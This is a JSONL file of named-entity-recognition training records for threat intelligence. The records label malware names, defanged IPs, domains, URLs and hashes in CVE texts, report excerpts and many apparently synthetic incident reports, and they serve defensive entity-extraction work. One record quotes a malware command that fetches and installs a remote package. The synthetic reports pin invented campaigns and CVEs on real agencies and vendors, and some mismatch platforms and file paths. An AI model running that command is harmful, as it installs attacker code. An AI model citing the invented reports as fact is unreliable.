{"text": "The “ idXXXXX[ . ]top ” pattern immediately stands out and may suggest a pattern in the static configuration for the initial domains used by the DGA for Nymaim since the previous two started with “ ejX[ . ]com .", "spans": {"Malware: Nymaim": [[153, 159]], "Indicator: ejX.com": [[198, 209]], "Indicator: idXXXXX.top": [[6, 21]]}, "info": {"id": "cyberner_stix_train_002319", "source": "defanged_augment"}}
{"text": "Lookout said in its own blog post published Wednesday that its threat detection network has recently observed a surge of Shedun attacks , indicating the scourge wo n't be going away any time soon . The researchers found that there are common elements in the macro and in the first- stage RAT used in this campaign , with former campaigns of the NICKEL ACADEMY ( Lazarus ) threat group . APT33 : 192 [ . ] 119 [ . ] 15 [ . ] 35 [REDACTED][ . ]ddns[ . ]net . The threat actor cleared Windows Event Logs on affected backend Exchange servers so further information was not available regarding the PowerShell commands leveraged by the threat actors .", "spans": {"Organization: Lookout": [[0, 7]], "Malware: Shedun": [[121, 127]], "Indicator: 192.119.15.35": [[395, 426]], "Indicator: [REDACTED].ddns.net": [[427, 454]]}, "info": {"id": "cyberner_stix_train_000129", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 43[.]241[.]225[.]109, the CISA IR team identified Amadey running as C:\\Users\\admin\\Downloads\\backdoor.elf. The threat actor, believed to be Lazarus Group, used Chisel for credential harvesting and Ligolo for lateral movement. Exfiltrated data was sent to gatewayapi[.]link and staticedge[.]org. The initial dropper (MD5: a60826193610bf0ce9276cd92197e17b) was delivered via a phishing email from finance@identity-verify[ . ]cc. A second C2 node was observed at 195 [ . ] 79 [ . ] 246 [ . ] 6, with a persistence mechanism writing to C:\\Users\\admin\\Desktop\\sam.hive.", "spans": {"Indicator: 43.241.225.109": [[64, 84]], "Organization: CISA": [[90, 94]], "Malware: Amadey": [[114, 120]], "Indicator: gatewayapi.link": [[319, 336]], "Indicator: staticedge.org": [[341, 357]], "Indicator: a60826193610bf0ce9276cd92197e17b": [[385, 417]], "Indicator: finance@identity-verify.cc": [[459, 489]], "Indicator: 195.79.246.6": [[524, 554]]}, "info": {"id": "synth_v2_00322", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Europol identified a large-scale phishing operation. Emails originated from confirm@account-update[ . ]xyz and alert@auth-check[.]org, spoofing legitimate services. Victims were directed to hxxp://cache-secure[ . ]dev/callback which hosted a credential harvesting page on cdncloud[ . ]net. A secondary link hxxp://proxy-update[ . ]site/download/update.exe delivered Play (SHA256: e8f1fb5a2924602e7ee92872875651fa2afbac836c2e5695e0332bccc89f33cf). The malware was saved to C:\\Users\\admin\\AppData\\Local\\Temp\\agent.py and established C2 with 2[.]94[.]77[.]12.", "spans": {"Organization: Europol": [[26, 33]], "Indicator: confirm@account-update.xyz": [[102, 132]], "Indicator: alert@auth-check.org": [[137, 159]], "Indicator: http://cache-secure.dev/callback": [[216, 252]], "Indicator: cdncloud.net": [[298, 314]], "Indicator: hxxp://proxy-update.site/download/update.exe": [[333, 381]], "Malware: Play": [[392, 396]], "Indicator: e8f1fb5a2924602e7ee92872875651fa2afbac836c2e5695e0332bccc89f33cf": [[406, 470]], "Indicator: 2.94.77.12": [[565, 581]]}, "info": {"id": "synth_v2_01068", "source": "defanged_augment"}}
{"text": "The new SOL protocol within the PLATINUM file-transfer tool makes use of the AMT Technology SDK 's Redirection Library API ( imrsdk.dll ) . To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103 [ . ] 236 [ . ] 150 [ . ] 14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability .", "spans": {"Malware: imrsdk.dll": [[125, 135]], "Organization: Microsoft": [[326, 335]], "Vulnerability: CVE-2017-11882": [[397, 411]], "Indicator: 103.236.150.14": [[252, 284]]}, "info": {"id": "cyberner_stix_train_000565", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.VBKryptPS.Trojan Trojan/W32[.]VBKrypt[.]147456[.]CC Downldr.Umbald.S624840 Trojan.VBKrypt.Win32.179340 Troj.W32.VBKrypt.tpcC Trojan/VBKrypt.mhte Win32.Trojan.WisdomEyes.16070401.9500.9970 W32/VBTrojan.Dropper.4!Maximus Trojan.VBKrypt Trojan.Win32.VBKrypt.xabo Trojan.Win32.Umbra.efkzrr Trojan.Win32.A.VBKrypt.147456.YW BackDoor.Umbra.10 W32/VBTrojan.Dropper.4!Maximus Trojan/VBKrypt.hmyy Trojan/Win32.VBKrypt Win32.Troj.VBKrypt.kcloud TrojanDownloader:Win32/Umbald.A Trojan.Symmi.DD60 Trojan.Win32.VBKrypt.xabo Trojan/Win32.Jorik.R27694 Trojan.Crypt Win32/Delf.AVY W32/VBKrypt.MBSX!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.VBKrypt.147456.CC": [[54, 81]]}, "info": {"id": "cyner2_train_006376", "source": "defanged_augment"}}
{"text": "Trend of the year : mobile banking Trojans 2013 was marked by a rapid rise in the number of Android banking Trojans . TClient , for instance , uses DLL hijacking and injection that may not be as noticeable to others . The path to wmplayer[ . ]exe is provided by the Config module . Additionally , Mandiant has observed the use of the SoftPerfect network scanner ( netscan.exe ) to perform internal network enumeration .", "spans": {"System: Android": [[92, 99]], "Indicator: wmplayer.exe": [[230, 246]]}, "info": {"id": "cyberner_stix_train_004046", "source": "defanged_augment"}}
{"text": "The address , 176[.]31[.]112[.]10 , is a dedicated server provided by the French OVH hosting company , but is apparently operated by an offshore secure hosting company called CrookServers.com .", "spans": {"Indicator: 176.31.112.10": [[14, 33]], "Organization: CrookServers.com": [[175, 191]]}, "info": {"id": "cyberner_stix_train_003965", "source": "defanged_augment"}}
{"text": "Blog Post by INTERPOL: Tracking FIN7's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-38077 against Atlassian Confluence deployments. The initial access vector involves spear-phishing emails from alert@document-share[ . ]link delivering BumbleBee. Post-compromise, the attackers deploy QakBot and use Seatbelt for reconnaissance. C2 infrastructure includes 10[.]190[.]99[.]225 and staticproxy[.]tech. A staging server at hxxp://cache-portal[.]link/panel/index.html hosts additional tooling. Key artifact: C:\\Users\\admin\\Desktop\\svchost.exe (SHA256: 7c438a6638a18b87b6145c9a3bdbf0395687ba6e0f234ec9418a7b3dfa27d9a8).", "spans": {"Organization: INTERPOL": [[13, 21]], "Vulnerability: CVE-2025-38077": [[116, 130]], "System: Atlassian Confluence": [[139, 159]], "Indicator: alert@document-share.link": [[235, 264]], "Malware: BumbleBee": [[276, 285]], "Malware: QakBot": [[325, 331]], "Indicator: 10.190.99.225": [[396, 415]], "Indicator: staticproxy.tech": [[420, 438]], "Indicator: hxxp://cache-portal.link/panel/index.html": [[460, 503]], "Indicator: 7c438a6638a18b87b6145c9a3bdbf0395687ba6e0f234ec9418a7b3dfa27d9a8": [[588, 652]]}, "info": {"id": "synth_v2_01544", "source": "defanged_augment"}}
{"text": "The c2 domain ( khanji[.]ddns[.]net ) was also found to be associated with multiple malware samples in the past , Some of these malware samples made connection to pastebin urls upon execution , which is similar to the behavior mentioned previously .", "spans": {"Indicator: khanji.ddns.net": [[16, 35]]}, "info": {"id": "cyberner_stix_train_001144", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172[.]140[.]179[.]31, the SentinelOne IR team identified DarkSide running as C:\\Windows\\Temp\\config.dat. The threat actor, believed to be UNC2452, used LinPEAS for credential harvesting and Covenant for lateral movement. Exfiltrated data was sent to api-secure[.]club and secure-storage[ . ]cc. The initial dropper (SHA1: 0b8c9dc8a90fc5c67f5b61b229ffde436e391735) was delivered via a phishing email from updates@secure-verify[ . ]net. A second C2 node was observed at 120[.]44[.]237[.]23, with a persistence mechanism writing to C:\\Windows\\Temp\\runtime.dll.", "spans": {"Indicator: 172.140.179.31": [[64, 84]], "Organization: SentinelOne": [[90, 101]], "Malware: DarkSide": [[121, 129]], "Indicator: api-secure.club": [[314, 331]], "Indicator: secure-storage.cc": [[336, 357]], "Indicator: 0b8c9dc8a90fc5c67f5b61b229ffde436e391735": [[386, 426]], "Indicator: updates@secure-verify.net": [[468, 497]], "Indicator: 120.44.237.23": [[532, 551]]}, "info": {"id": "synth_v2_00449", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Qbot Campaign:\nNetwork Indicators:\n- 198[.]86[.]80[.]219\n- 151 [ . ] 89 [ . ] 140 [ . ] 145\n- 84[.]82[.]107[.]202\n- proxysync[.]top\n- login-cdn[.]live\nURLs:\n- hxxps://synccdn[.]online/login\n- hxxps://apistorage[ . ]cc/download/update.exe\nEmail Senders:\n- finance@account-update[ . ]xyz\n- contact@document-share[ . ]link\nFile Indicators:\n- SHA256: 6f3229bcedc97881aedb5e037f951f137189732eb7d4e559ef7ccc558e158f85\n- SHA1: 273b7b83f3593d2c35b90c9c6c451e51c981ef61\n- Drop path: /opt/app/bin/beacon.dll", "spans": {"Malware: Qbot": [[15, 19]], "Indicator: 198.86.80.219": [[52, 71]], "Indicator: 151.89.140.145": [[74, 106]], "Indicator: 84.82.107.202": [[109, 128]], "Indicator: proxysync.top": [[131, 146]], "Indicator: login-cdn.live": [[149, 165]], "Indicator: hxxps://synccdn.online/login": [[174, 204]], "Indicator: hxxps://apistorage.cc/download/update.exe": [[207, 252]], "Indicator: finance@account-update.xyz": [[270, 300]], "Indicator: contact@document-share.link": [[303, 334]], "Indicator: 6f3229bcedc97881aedb5e037f951f137189732eb7d4e559ef7ccc558e158f85": [[362, 426]], "Indicator: 273b7b83f3593d2c35b90c9c6c451e51c981ef61": [[435, 475]]}, "info": {"id": "synth_v2_01454", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2026-39735 is a critical CSRF vulnerability affecting Ivanti Connect Secure. CISA confirmed active exploitation by Sandworm in the wild. Exploitation delivers Hive (MD5: b999e3d6dc449a21df718d3763c1da50) which is dropped to C:\\Users\\admin\\Desktop\\config.dat. The exploit payload is hosted at hxxps://cloud-auth[ . ]io/secure/token and communicates to 181 [ . ] 219 [ . ] 129 [ . ] 128 for C2.", "spans": {"Vulnerability: CVE-2026-39735": [[24, 38]], "Vulnerability: CSRF vulnerability": [[53, 71]], "System: Ivanti Connect Secure": [[82, 103]], "Organization: CISA": [[105, 109]], "Malware: Hive": [[187, 191]], "Indicator: b999e3d6dc449a21df718d3763c1da50": [[198, 230]], "Indicator: hxxps://cloud-auth.io/secure/token": [[320, 358]], "Indicator: 181.219.129.128": [[379, 412]]}, "info": {"id": "synth_v2_00730", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2021-16078 is a critical type confusion affecting Palo Alto PAN-OS. NSA confirmed active exploitation by Scattered Spider in the wild. Exploitation delivers AsyncRAT (SHA1: 42023d94ec9303e6f3d8010c1b5b3aad166d85dd) which is dropped to /var/tmp/beacon.dll. The exploit payload is hosted at hxxp://edgeupdate[ . ]link/wp-content/uploads/doc.php and communicates to 75 [ . ] 20 [ . ] 59 [ . ] 62 for C2.", "spans": {"Vulnerability: CVE-2021-16078": [[24, 38]], "Vulnerability: type confusion": [[53, 67]], "System: Palo Alto PAN-OS": [[78, 94]], "Organization: NSA": [[96, 99]], "Malware: AsyncRAT": [[185, 193]], "Indicator: 42023d94ec9303e6f3d8010c1b5b3aad166d85dd": [[201, 241]], "Indicator: http://edgeupdate.link/wp-content/uploads/doc.php": [[317, 370]], "Indicator: 75.20.59.62": [[391, 420]]}, "info": {"id": "synth_v2_00666", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu/fence: Fix oops due to non-matching drm_sched init/fini\n\nCurrently amdgpu calls drm_sched_fini() from the fence driver sw fini\nroutine - such function is expected to be called only after the\nrespective init function - drm_sched_init() - was executed successfully.\n\nHappens that we faced a driver probe failure in the Steam Deck\nrecently, and the function drm_sched_fini() was called even without\nits counter-part had been previously called, causing the following oops:\n\namdgpu: probe of 0000:04:00.0 failed with error -110\nBUG: kernel NULL pointer dereference, address: 0000000000000090\nPGD 0 P4D 0\nOops: 0002 [#1] PREEMPT SMP NOPTI\nCPU: 0 PID: 609 Comm: systemd-udevd Not tainted 6.2.0-rc3-gpiccoli #338\nHardware name: Valve Jupiter/Jupiter, BIOS F7A0113 11/04/2022\nRIP: 0010:drm_sched_fini+0x84/0xa0 [gpu_sched]\n[...]\nCall Trace:\n <TASK>\n amdgpu_fence_driver_sw_fini+0xc8/0xd0 [amdgpu]\n amdgpu_device_fini_sw+0x2b/0x3b0 [amdgpu]\n amdgpu_driver_release_kms+0x16/0x30 [amdgpu]\n devm_drm_dev_init_release+0x49/0x70\n [...]\n\nTo prevent that, check if the drm_sched was properly initialized for a\ngiven ring before calling its fini counter-part.\n\nNotice ideally we'd use sched.ready for that; such field is set as the latest\nthing on drm_sched_init(). But amdgpu seems to \"override\" the meaning of such\nfield - in the above oops for example, it was a GFX ring causing the crash, and\nthe sched.ready field was set to true in the ring init routine, regardless of\nthe state of the DRM scheduler. Hence, we ended-up using sched.ops as per\nChristian's suggestion [0], and also removed the no_scheduler check [1].\n\n[0] hxxps://lore[ . ]kernel[ . ]org/amd-gfx/984ee981-2906-0eaf-ccec-9f80975cb136@amd.com/\n[1] hxxps://lore[.]kernel[.]org/amd-gfx/cd0e2994-f85f-d837-609f-7056d5fb7231@amd.com/", "spans": {"Indicator: https://lore.kernel.org/amd-gfx/984ee981-2906-0eaf-ccec-9f80975cb136@amd.com/": [[1689, 1774]], "Indicator: https://lore.kernel.org/amd-gfx/cd0e2994-f85f-d837-609f-7056d5fb7231@amd.com/": [[1779, 1860]], "System: Linux kernel": [[7, 19]], "System: systemd": [[735, 742]], "Vulnerability: NULL pointer dereference": [[615, 639]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-52738"}}
{"text": "Malware Analysis Report: RemcosRAT (MD5: 6bf753ff87824ec41bf2cf9ab26860ba). Upon execution on Cisco ASA, the sample creates /usr/local/bin/winlogon.exe and injects into legitimate processes. Network analysis shows beaconing to 172 [ . ] 187 [ . ] 7 [ . ] 112 every 60 seconds and DNS queries to login-cache[ . ]org. The second stage was fetched from hxxp://auth-update[ . ]site/download/update.exe and written to /tmp/svchost.exe. The payload uses PowerShell Empire-style techniques for defense evasion. A secondary hash (SHA1: 4974b26a59a7276f5b6620322e45110f1565bfc1) was extracted from the unpacked payload.", "spans": {"Malware: RemcosRAT": [[25, 34]], "Indicator: 6bf753ff87824ec41bf2cf9ab26860ba": [[41, 73]], "System: Cisco ASA": [[94, 103]], "Indicator: 172.187.7.112": [[227, 258]], "Indicator: login-cache.org": [[295, 314]], "Indicator: http://auth-update.site/download/update.exe": [[350, 397]], "Indicator: 4974b26a59a7276f5b6620322e45110f1565bfc1": [[528, 568]]}, "info": {"id": "synth_v2_00552", "source": "defanged_augment"}}
{"text": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3[.]6[.]6[.]922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CR2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated structure. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-11434.", "spans": {"Indicator: 3.6.6.922": [[125, 140]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-27856"}}
{"text": "A backdoor also known as: Backdoor/W32.Amitis.827392 Backdoor.Amitis!GgBFlh0m/G4 W32/Amitis.MXVV-8538 Backdoor.Amitis Win32/Amitis.13 BKDR_AMITIS.B Trojan.Amitis.13-B Backdoor.Win32.Amitis.13 Trojan.Win32.Amitis.dbhy Backdoor.Win32.S.Amitis.827392.A[h] Backdoor.W32.Amitis.13!c Backdoor.Win32.Amitis.13 BackDoor.Amitist.13 Backdoor.Amitis.Win32.17 BKDR_AMITIS.B BehavesLike[.]Win32[.]Downloader[.]ch W32/Amitis.N@bd Backdoor/Amitis.p W32/Amitis.C!tr Trojan[Backdoor]/Win32.Amitis Win-Trojan/Amitis.827392 Backdoor:Win32/Amitis.1_3 Win32/Amitis.13 Backdoor.Amitis Win32.Backdoor.Amitis.Akfc Backdoor.Win32.Amitis BackDoor.Amitis.G Backdoor.Win32.Amitis.13", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Downloader.ch": [[362, 399]]}, "info": {"id": "cyner2_train_007434", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Amadey campaign:\nStage 1 dropper at /usr/local/bin/runtime.dll - MD5: 5accbf6e241cdb2e8427a7afef730fc1\nStage 2 loader at /etc/cron.d/ntds.dit - SHA256: 51c0a4886999a2bcf0cc017844b996cdb666eb3d69a54709f566ef60160ed6af\nFinal payload at /tmp/runtime.dll - SHA1: d9845ac72966f6cfc937cb89388af51c2712c944\nExfiltration module - MD5: d148c2d45a862c3a6dabee5048770a9c\nAll stages communicated with 152 [ . ] 43 [ . ] 124 [ . ] 188. Chisel signatures detected in Stage 2.", "spans": {"Malware: Amadey": [[22, 28]], "Indicator: 5accbf6e241cdb2e8427a7afef730fc1": [[92, 124]], "Indicator: 51c0a4886999a2bcf0cc017844b996cdb666eb3d69a54709f566ef60160ed6af": [[174, 238]], "Indicator: d9845ac72966f6cfc937cb89388af51c2712c944": [[281, 321]], "Indicator: d148c2d45a862c3a6dabee5048770a9c": [[349, 381]], "Indicator: 152.43.124.188": [[411, 443]]}, "info": {"id": "synth_v2_01913", "source": "defanged_augment"}}
{"text": "Raspberry Robin is a worm that spreads via infected USB drives and has been linked to threat actor DEV-0856. The malware uses msiexec.exe to download payloads from compromised QNAP NAS devices. Observed C2 domains include q0[ . ]fo, t1[ . ]cx, and v0[.]cx. The malware drops files to C:\\Users\\Public\\Libraries\\ and C:\\Windows\\Temp\\. Initial infection uses cmd.exe to launch msiexec with URLs like msiexec /q /i hxxp://q0[ . ]fo/b.msi. Related hashes include SHA256 7e6a2b21548ee7446c9a3e9ac3e3e93c8b06b110d2a1cea16e976e3be1e758a2 and MD5 4b41e2e5a3f44a95bfe6d0d2b6e0c1d7. The malware has been observed deploying Cobalt Strike, IcedID, and Bumblebee as secondary payloads. It communicates through Tor exit nodes at 185[.]220[.]101[.]34 and 185 [ . ] 220 [ . ] 101 [ . ] 58.", "spans": {"Malware: Raspberry Robin": [[0, 15]], "System: QNAP": [[176, 180]], "Indicator: q0.fo": [[222, 231]], "Indicator: t1.cx": [[233, 242]], "Indicator: v0.cx": [[248, 255]], "Indicator: http://q0.fo/b.msi": [[411, 433]], "Indicator: 7e6a2b21548ee7446c9a3e9ac3e3e93c8b06b110d2a1cea16e976e3be1e758a2": [[465, 529]], "Indicator: 4b41e2e5a3f44a95bfe6d0d2b6e0c1d7": [[538, 570]], "Malware: Cobalt Strike": [[612, 625]], "Malware: IcedID": [[627, 633]], "Malware: Bumblebee": [[639, 648]], "Indicator: 185.220.101.34": [[714, 734]], "Indicator: 185.220.101.58": [[739, 771]]}, "info": {"id": "malware_00014", "source": "defanged_augment"}}
{"text": "Sets file creation timestamp to that of “ %SYSTEM%\\sfc[ . ]dll ” .", "spans": {"Indicator: %SYSTEM%\\sfc.dll": [[42, 62]]}, "info": {"id": "cyberner_stix_train_005092", "source": "defanged_augment"}}
{"text": "We 've seen this actor rely heavily on phishing campaigns to trick victims into downloading their malicious apps , specifically on Facebook . The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report . However, starting from 7Zip version 9.34 (next available installer after version 9.22) up to its latest version 19.0, 7zip saw and was able to extract the image file order[ . ]jpg . Second , as COSMICENERGY was potentially developed as part of a red team , this discovery suggests that the barriers to entry are lowering for offensive OT threat activity since we normally observe these types of capabilities limited to well resourced or state sponsored actors .", "spans": {"Organization: Facebook": [[131, 139]], "Organization: Novetta": [[195, 202]], "Indicator: order.jpg": [[422, 435]], "Malware: COSMICENERGY": [[450, 462]]}, "info": {"id": "cyberner_stix_train_000651", "source": "defanged_augment"}}
{"text": "] databit [ . The Mofang group has been active in relation to the Kyaukphyu sez . status[ . ]acmetoy[ . ]com /DD/ myScript[ . ]js or status[ . ]acmetoy[ . ]com /DD/ css[.]css . On March 2 , 2021 , Microsoft released a blog post that detailed multiple zero - day vulnerabilities used to attack on - premises versions of Microsoft Exchange Server .", "spans": {"Indicator: status.acmetoy.com": [[82, 108], [133, 159]], "Indicator: myScript.js": [[114, 129]], "Indicator: css.css": [[165, 174]], "Organization: Microsoft": [[197, 206]], "Vulnerability: multiple zero - day vulnerabilities": [[242, 277]], "System: Microsoft Exchange Server": [[319, 344]]}, "info": {"id": "cyberner_stix_train_004224", "source": "defanged_augment"}}
{"text": "id=eu.chainfire.supersu ) tool 246[.]us us.x SuperSU ELF binaries supersu.cfg supersu.cfg.ju supersu.cfg.old SuperSU configs with spyware implant mention bb.txt BusyBox v1.26.2 ELF file bdata.xml Config file for excluding malware components from Android battery saver feature Doze bdatas.apk Main implant module com.android.network.irc.apk Start implant module MobileManagerService.apk ASUS firmware system component ( clean ) mobilemanager.apk", "spans": {"System: Android": [[246, 253]], "Organization: ASUS": [[386, 390]], "Indicator: 246.us": [[31, 39]]}, "info": {"id": "cyner_train_000629", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172[.]85[.]17[.]246, the Zscaler ThreatLabz IR team identified AgentTesla running as C:\\Users\\admin\\Downloads\\csrss.exe. The threat actor, believed to be BlackTech, used Mythic for credential harvesting and Sharphound for lateral movement. Exfiltrated data was sent to portalupdate[.]net and storage-gateway[ . ]link. The initial dropper (SHA256: b2962e6ba6d3b7effc326bea469b4c19a9470d7ac8f0c0ec11f14e2542198393) was delivered via a phishing email from it@auth-check[ . ]org. A second C2 node was observed at 151[.]209[.]150[.]155, with a persistence mechanism writing to /var/tmp/chrome_helper.exe.", "spans": {"Indicator: 172.85.17.246": [[64, 83]], "Organization: Zscaler ThreatLabz": [[89, 107]], "Malware: AgentTesla": [[127, 137]], "Indicator: portalupdate.net": [[333, 351]], "Indicator: storage-gateway.link": [[356, 380]], "Indicator: b2962e6ba6d3b7effc326bea469b4c19a9470d7ac8f0c0ec11f14e2542198393": [[411, 475]], "Indicator: it@auth-check.org": [[517, 538]], "Indicator: 151.209.150.155": [[573, 594]]}, "info": {"id": "synth_v2_00386", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed GhostPack artifacts at C:\\Users\\admin\\Downloads\\winlogon.exe. Memory dump analysis confirmed execution of LaZagne. Registry modifications pointed to persistence via /opt/app/bin/loader.exe. Network forensics identified connections to 172[.]20[.]113[.]22 and mailedge[ . ]dev. Email headers traced the initial vector to admin@document-share[ . ]link. File C:\\Program Files\\Common Files\\config.dat (MD5: d734ff0838a33dd15ae2c8d5c6089b62) was identified as the initial dropper. A staging URL hxxps://authedge[ . ]site/portal/verify resolved to 71 [ . ] 9 [ . ] 121 [ . ] 6. Secondary artifact hash: MD5: 6478fccc188d34653833b2b2791778f1.", "spans": {"Indicator: 172.20.113.22": [[306, 325]], "Indicator: mailedge.dev": [[330, 346]], "Indicator: admin@document-share.link": [[391, 420]], "Indicator: d734ff0838a33dd15ae2c8d5c6089b62": [[474, 506]], "Indicator: hxxps://authedge.site/portal/verify": [[561, 600]], "Indicator: 71.9.121.6": [[613, 641]], "Indicator: 6478fccc188d34653833b2b2791778f1": [[673, 705]]}, "info": {"id": "synth_v2_01254", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: NCSC identified a large-scale phishing operation. Emails originated from finance@login-portal[ . ]tech and billing@identity-verify[ . ]cc, spoofing legitimate services. Victims were directed to hxxps://cache-static[.]cc/callback which hosted a credential harvesting page on auth-cdn[.]io. A secondary link hxxps://syncstorage[ . ]com/assets/js/payload.js delivered StealC (MD5: 4adc29400ed734004dab71b19e3da6bb). The malware was saved to /dev/shm/helper.sh and established C2 with 192[.]119[.]174[.]42.", "spans": {"Organization: NCSC": [[26, 30]], "Indicator: finance@login-portal.tech": [[99, 128]], "Indicator: billing@identity-verify.cc": [[133, 163]], "Indicator: https://cache-static.cc/callback": [[220, 254]], "Indicator: auth-cdn.io": [[300, 313]], "Indicator: hxxps://syncstorage.com/assets/js/payload.js": [[332, 380]], "Malware: StealC": [[391, 397]], "Indicator: 4adc29400ed734004dab71b19e3da6bb": [[404, 436]], "Indicator: 192.119.174.42": [[507, 527]]}, "info": {"id": "synth_v2_00889", "source": "defanged_augment"}}
{"text": "Gatsby is a free and open source framework based on React. The Gatsby framework prior to versions 4.25.7 and 5.9.1 contain a Local File Inclusion vulnerability in the `__file-code-frame` and `__original-stack-frame` paths, exposed when running the Gatsby develop server (`gatsby develop`). Any file in scope of the development server could potentially be exposed. It should be noted that by default `gatsby develop` is only accessible via the localhost `127 [ . ] 0 [ . ] 0 [ . ] 1`, and one would need to intentionally expose the server to other interfaces to exploit this vulnerability by using server options such as `--host 0 [ . ] 0 [ . ] 0 [ . ] 0`, `-H 0 [ . ] 0 [ . ] 0 [ . ] 0`, or the `GATSBY_HOST=0[.]0[.]0[.]0` environment variable. A patch has been introduced in `gatsby@5.9.1` and `gatsby@4.25.7` which mitigates the issue. Users are advised to upgrade. Users unable to upgrade should avoid exposing their development server to the internet.", "spans": {"Indicator: 127.0.0.1": [[454, 481]], "Indicator: 0.0.0.0": [[628, 653], [660, 685], [708, 721]], "Vulnerability: Local File Inclusion": [[125, 145]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-34238"}}
{"text": "A Chinese advanced persistent threat APT compromised Forbes[.]com to set up a watering hole style web-based drive-by attack against US Defense and Financial Services firms in late November 2014.", "spans": {"Vulnerability: watering hole style web-based drive-by attack": [[78, 123]], "Organization: US Defense": [[132, 142]], "Organization: Financial Services firms": [[147, 171]], "Indicator: Forbes.com": [[53, 65]]}, "info": {"id": "cyner2_train_003204", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/huge_memory: fix folio isn't locked in softleaf_to_folio()\n\nOn arm64 server, we found folio that get from migration entry isn't locked\nin softleaf_to_folio().  This issue triggers when mTHP splitting and\nzap_nonpresent_ptes() races, and the root cause is lack of memory barrier\nin softleaf_to_folio().  The race is as follows:\n\n\tCPU0                                             CPU1\n\ndeferred_split_scan()                              zap_nonpresent_ptes()\n  lock folio\n  split_folio()\n    unmap_folio()\n      change ptes to migration entries\n    __split_folio_to_order()                         softleaf_to_folio()\n      set flags(including PG_locked) for tail pages    folio = pfn_folio(softleaf_to_pfn(entry))\n      smp_wmb()                                        VM_WARN_ON_ONCE(!folio_test_locked(folio))\n      prep_compound_page() for tail pages\n\nIn __split_folio_to_order(), smp_wmb() guarantees page flags of tail pages\nare visible before the tail page becomes non-compound.  smp_wmb() should\nbe paired with smp_rmb() in softleaf_to_folio(), which is missed.  As a\nresult, if zap_nonpresent_ptes() accesses migration entry that stores tail\npfn, softleaf_to_folio() may see the updated compound_head of tail page\nbefore page->flags.\n\nThis issue will trigger VM_WARN_ON_ONCE() in pfn_swap_entry_folio()\nbecause of the race between folio split and zap_nonpresent_ptes()\nleading to a folio incorrectly undergoing modification without a folio\nlock being held.\n\nThis is a BUG_ON() before commit 93976a20345b (\"mm: eliminate further\nswapops predicates\"), which in merged in v6.19-rc1.\n\nTo fix it, add missing smp_rmb() if the softleaf entry is migration entry\nin softleaf_to_folio() and softleaf_to_page().\n\n[tujinjiang@huawei[ . ]com: update function name and comments]", "spans": {"Indicator: huawei.com": [[1794, 1808]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-31466"}}
{"text": "HUAWEI Mate 20 versions Versions earlier than 10[.]1[.]0[.]160(C00E160R3P8);HUAWEI Mate 20 Pro versions Versions earlier than 10 [ . ] 1 [ . ] 0 [ . ] 270(C431E7R1P5),Versions earlier than 10[.]1[.]0[.]270(C635E3R1P5),Versions earlier than 10 [ . ] 1 [ . ] 0 [ . ] 273(C636E7R2P4);HUAWEI Mate 20 X versions Versions earlier than 10[.]1[.]0[.]160(C00E160R2P8);HUAWEI P30 versions Versions earlier than 10 [ . ] 1 [ . ] 0 [ . ] 160(C00E160R2P11);HUAWEI P30 Pro versions Versions earlier than 10[.]1[.]0[.]160(C00E160R2P8);HUAWEI Mate 20 RS versions Versions earlier than 10[.]1[.]0[.]160(C786E160R3P8);HonorMagic2 versions Versions earlier than 10 [ . ] 0 [ . ] 0 [ . ] 187(C00E61R2P11);Honor20 versions Versions earlier than 10[.]0[.]0[.]175(C00E58R4P11);Honor20 PRO versions Versions earlier than 10 [ . ] 0 [ . ] 0 [ . ] 194(C00E62R8P12);HonorMagic2 versions Versions earlier than 10 [ . ] 0 [ . ] 0 [ . ] 187(C00E61R2P11);HonorV20 versions Versions earlier than 10 [ . ] 0 [ . ] 0 [ . ] 188(C00E62R2P11) have an improper authentication vulnerability. The system does not properly sign certain encrypted file, the attacker should gain the key used to encrypt the file, successful exploit could cause certain file be forged", "spans": {"Indicator: 10.1.0.160": [[46, 62], [329, 345], [401, 429], [490, 506], [569, 585]], "Indicator: 10.1.0.270": [[126, 154], [189, 205]], "Indicator: 10.1.0.273": [[240, 268]], "Indicator: 10.0.0.187": [[643, 671], [882, 910]], "Indicator: 10.0.0.175": [[724, 740]], "Indicator: 10.0.0.194": [[797, 825]], "Indicator: 10.0.0.188": [[964, 992]], "Vulnerability: improper authentication": [[1014, 1037]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-9244"}}
